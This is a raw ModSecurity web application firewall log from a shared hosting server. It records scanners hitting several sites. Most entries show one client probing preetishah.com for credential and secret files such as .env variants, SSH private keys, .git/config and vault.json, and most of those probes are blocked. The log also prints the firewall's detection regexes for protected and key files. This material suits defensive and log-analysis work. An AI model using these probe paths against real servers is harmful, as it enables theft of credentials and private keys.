[Tue May 26 17:04:06.101050 2026] [security2:error] [pid 851641:tid 851785] [client 4.201.75.230:33557] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/class.php"] [unique_id "ahWFLhp8QSN2510avp4pNQAAAA4"]
[Tue May 26 17:04:06.371236 2026] [security2:error] [pid 851641:tid 851828] [client 72.14.147.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWFLhp8QSN2510avp4pcgAAADk"]
[Tue May 26 17:04:06.372091 2026] [security2:error] [pid 851641:tid 851806] [client 72.14.147.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWFLhp8QSN2510avp4pcwAAACM"]
[Tue May 26 17:04:06.771399 2026] [security2:error] [pid 851641:tid 851772] [client 4.201.75.230:30540] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahWFLhp8QSN2510avp4pgQAAAAE"]
[Tue May 26 17:04:06.771499 2026] [security2:error] [pid 851641:tid 851772] [client 4.201.75.230:30540] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahWFLhp8QSN2510avp4pgQAAAAE"]
[Tue May 26 17:04:06.853434 2026] [security2:error] [pid 851641:tid 851804] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFLhp8QSN2510avp4pegAAACE"]
[Tue May 26 17:04:07.186406 2026] [security2:error] [pid 851641:tid 851880] [client 4.201.75.230:21756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/info.php"] [unique_id "ahWFLxp8QSN2510avp4piwAAAG0"]
[Tue May 26 17:04:07.186537 2026] [security2:error] [pid 851641:tid 851880] [client 4.201.75.230:21756] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "directi.con.md-74.webhostbox.net"] [uri "/info.php"] [unique_id "ahWFLxp8QSN2510avp4piwAAAG0"]
[Tue May 26 17:04:09.188047 2026] [security2:error] [pid 851641:tid 851878] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFMBp8QSN2510avp4pxAAAAGs"]
[Tue May 26 17:04:09.891380 2026] [security2:error] [pid 851641:tid 851862] [client 78.190.43.26:16291] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.cagmedya.com"] [uri "/wp-admin/edit.php"] [unique_id "ahWFMRp8QSN2510avp4p4gAAWwE"], referer: https://www.cagmedya.com/wp-admin/edit.php?post_type=product
[Tue May 26 17:04:11.219158 2026] [security2:error] [pid 851641:tid 851750] [remote 52.18.195.140:52634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWFMxp8QSN2510avp4qEQAAPmw"]
[Tue May 26 17:04:11.346389 2026] [security2:error] [pid 851641:tid 851775] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFMhp8QSN2510avp4qEAAAAAQ"]
[Tue May 26 17:04:13.118333 2026] [security2:error] [pid 851641:tid 851860] [client 5.255.99.53:57420] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFNBp8QSN2510avp4qYwAAAFk"]
[Tue May 26 17:04:13.370722 2026] [security2:error] [pid 851641:tid 851785] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFNBp8QSN2510avp4qaQAAAA4"]
[Tue May 26 17:04:15.531921 2026] [security2:error] [pid 851641:tid 851827] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFNxp8QSN2510avp4qtwAAADg"]
[Tue May 26 17:04:16.457201 2026] [security2:error] [pid 851641:tid 851878] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOBp8QSN2510avp4q5QAAAGs"]
[Tue May 26 17:04:16.701993 2026] [security2:error] [pid 851641:tid 851831] [client 5.255.99.53:38144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "preetishah.com"] [uri "/public/.env"] [unique_id "ahWFOBp8QSN2510avp4rCQAAADw"]
[Tue May 26 17:04:16.702708 2026] [security2:error] [pid 851641:tid 851805] [client 5.255.99.53:38130] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "preetishah.com"] [uri "/backend/.env"] [unique_id "ahWFOBp8QSN2510avp4rCgAAACI"]
[Tue May 26 17:04:16.727394 2026] [security2:error] [pid 851641:tid 851819] [client 5.255.99.53:38050] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "preetishah.com"] [uri "/.env.backup"] [unique_id "ahWFOBp8QSN2510avp4rEAAAADA"]
[Tue May 26 17:04:16.728290 2026] [security2:error] [pid 851641:tid 851772] [client 5.255.99.53:38062] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "preetishah.com"] [uri "/.env.old"] [unique_id "ahWFOBp8QSN2510avp4rFAAAAAE"]
[Tue May 26 17:04:16.731893 2026] [security2:error] [pid 851641:tid 851883] [client 5.255.99.53:38142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "preetishah.com"] [uri "/app/.env"] [unique_id "ahWFOBp8QSN2510avp4rGQAAAHA"]
[Tue May 26 17:04:16.881415 2026] [security2:error] [pid 851641:tid 851781] [client 124.83.102.231:57262] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "kingsclubmembership.com"] [uri "/wp-comments-post.php"] [unique_id "ahWFOBp8QSN2510avp4q6wAAAAo"]
[Tue May 26 17:04:16.924338 2026] [security2:error] [pid 851641:tid 851821] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOBp8QSN2510avp4rDgAAADI"]
[Tue May 26 17:04:17.278131 2026] [security2:error] [pid 851641:tid 851873] [client 5.255.99.53:38238] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOBp8QSN2510avp4rBwAAAGY"]
[Tue May 26 17:04:17.281526 2026] [security2:error] [pid 851641:tid 851828] [client 5.255.99.53:38208] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOBp8QSN2510avp4rCwAAADk"]
[Tue May 26 17:04:17.290013 2026] [security2:error] [pid 851641:tid 851849] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOBp8QSN2510avp4rDwAAAE4"]
[Tue May 26 17:04:17.292850 2026] [security2:error] [pid 851641:tid 851774] [client 5.255.99.53:38264] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOBp8QSN2510avp4rBgAAAAM"]
[Tue May 26 17:04:17.293324 2026] [security2:error] [pid 851641:tid 851824] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOBp8QSN2510avp4rFwAAADU"]
[Tue May 26 17:04:17.327507 2026] [security2:error] [pid 851641:tid 851834] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOBp8QSN2510avp4rGAAAAD8"]
[Tue May 26 17:04:17.332780 2026] [security2:error] [pid 851641:tid 851840] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOBp8QSN2510avp4rGwAAAEU"]
[Tue May 26 17:04:17.355565 2026] [security2:error] [pid 851641:tid 851820] [client 5.255.99.53:38142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "preetishah.com"] [uri "/.env"] [unique_id "ahWFORp8QSN2510avp4rOAAAADE"]
[Tue May 26 17:04:17.376281 2026] [security2:error] [pid 851641:tid 851799] [client 5.255.99.53:37966] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOBp8QSN2510avp4rHgAAABw"]
[Tue May 26 17:04:17.532739 2026] [security2:error] [pid 851641:tid 851855] [client 5.255.99.53:38144] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFORp8QSN2510avp4rMQAAAFQ"]
[Tue May 26 17:04:17.537563 2026] [security2:error] [pid 851641:tid 851784] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFORp8QSN2510avp4rNQAAAA0"]
[Tue May 26 17:04:17.549188 2026] [security2:error] [pid 851641:tid 851819] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFORp8QSN2510avp4rPAAAADA"]
[Tue May 26 17:04:17.552499 2026] [security2:error] [pid 851641:tid 851779] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFORp8QSN2510avp4rNwAAAAg"]
[Tue May 26 17:04:17.595610 2026] [security2:error] [pid 851641:tid 851868] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFORp8QSN2510avp4rQQAAAGE"]
[Tue May 26 17:04:17.659474 2026] [security2:error] [pid 851641:tid 851871] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFORp8QSN2510avp4rRAAAAGQ"]
[Tue May 26 17:04:17.660655 2026] [security2:error] [pid 851641:tid 851842] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFORp8QSN2510avp4rMAAAAEc"]
[Tue May 26 17:04:17.975498 2026] [security2:error] [pid 851641:tid 851851] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFORp8QSN2510avp4rUQAAAFA"]
[Tue May 26 17:04:18.066838 2026] [security2:error] [pid 851641:tid 851777] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFORp8QSN2510avp4rVQAAAAY"]
[Tue May 26 17:04:18.161905 2026] [security2:error] [pid 851641:tid 851859] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFORp8QSN2510avp4rYQAAAFg"]
[Tue May 26 17:04:18.462914 2026] [security2:error] [pid 851641:tid 851814] [client 5.255.99.53:38054] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "preetishah.com"] [uri "/.env.bak"] [unique_id "ahWFOhp8QSN2510avp4rfgAAACs"]
[Tue May 26 17:04:18.470568 2026] [security2:error] [pid 851641:tid 851855] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOhp8QSN2510avp4rcQAAAFQ"]
[Tue May 26 17:04:18.502461 2026] [security2:error] [pid 851641:tid 851865] [client 5.255.99.53:38142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "preetishah.com"] [uri "/.ssh/id_dsa"] [unique_id "ahWFOhp8QSN2510avp4rggAAAF4"]
[Tue May 26 17:04:18.635360 2026] [security2:error] [pid 851641:tid 851805] [client 5.255.99.53:38264] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOhp8QSN2510avp4rdwAAACI"]
[Tue May 26 17:04:18.663895 2026] [security2:error] [pid 851641:tid 851878] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOhp8QSN2510avp4rgQAAAGs"]
[Tue May 26 17:04:18.665385 2026] [security2:error] [pid 851641:tid 851871] [client 5.255.99.53:38222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOhp8QSN2510avp4rfAAAAGQ"]
[Tue May 26 17:04:18.666857 2026] [security2:error] [pid 851641:tid 851850] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOhp8QSN2510avp4rfwAAAE8"]
[Tue May 26 17:04:18.698929 2026] [security2:error] [pid 851641:tid 851881] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOhp8QSN2510avp4reQAAAG4"]
[Tue May 26 17:04:18.704462 2026] [security2:error] [pid 851641:tid 851796] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOhp8QSN2510avp4rhQAAABk"]
[Tue May 26 17:04:18.929842 2026] [security2:error] [pid 851641:tid 851781] [client 124.83.102.231:57262] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "kingsclubmembership.com"] [uri "/wp-comments-post.php"] [unique_id "ahWFOBp8QSN2510avp4q6wAAAAo"]
[Tue May 26 17:04:18.929925 2026] [security2:error] [pid 851641:tid 851781] [client 124.83.102.231:57262] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kingsclubmembership.com"] [uri "/wp-comments-post.php"] [unique_id "ahWFOBp8QSN2510avp4q6wAAAAo"]
[Tue May 26 17:04:18.983413 2026] [security2:error] [pid 851641:tid 851851] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOhp8QSN2510avp4rmwAAAFA"]
[Tue May 26 17:04:19.042825 2026] [security2:error] [pid 851641:tid 851858] [client 5.255.99.53:38062] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "preetishah.com"] [uri "/api/.env"] [unique_id "ahWFOxp8QSN2510avp4rqgAAAFc"]
[Tue May 26 17:04:19.079441 2026] [security2:error] [pid 851641:tid 851778] [client 5.255.99.53:37956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "preetishah.com"] [uri "/.ssh/id_rsa"] [unique_id "ahWFOxp8QSN2510avp4rrgAAAAc"]
[Tue May 26 17:04:19.102164 2026] [security2:error] [pid 851641:tid 851882] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOhp8QSN2510avp4rlwAAAG8"], referer: http://preetishah.com/.git/config
[Tue May 26 17:04:19.329037 2026] [security2:error] [pid 851641:tid 851802] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOxp8QSN2510avp4rqAAAAB8"]
[Tue May 26 17:04:19.351046 2026] [security2:error] [pid 851641:tid 851859] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOxp8QSN2510avp4rrAAAAFg"]
[Tue May 26 17:04:19.463383 2026] [security2:error] [pid 851641:tid 851799] [client 5.255.99.53:38266] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOxp8QSN2510avp4rrwAAABw"]
[Tue May 26 17:04:19.660455 2026] [security2:error] [pid 851641:tid 851857] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOxp8QSN2510avp4rvAAAAFY"], referer: http://preetishah.com/application.yml
[Tue May 26 17:04:19.660914 2026] [security2:error] [pid 851641:tid 851844] [client 5.255.99.53:46556] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOxp8QSN2510avp4rsQAAAEk"], referer: http://preetishah.com/secrets/vault.json
[Tue May 26 17:04:19.781298 2026] [security2:error] [pid 851641:tid 851852] [client 5.255.99.53:38028] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOxp8QSN2510avp4rxgAAAFE"]
[Tue May 26 17:04:19.788949 2026] [security2:error] [pid 851641:tid 851865] [client 5.255.99.53:38174] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOxp8QSN2510avp4rxQAAAF4"]
[Tue May 26 17:04:19.809137 2026] [security2:error] [pid 851641:tid 851807] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFOxp8QSN2510avp4rwgAAACQ"], referer: http://preetishah.com/.env.local
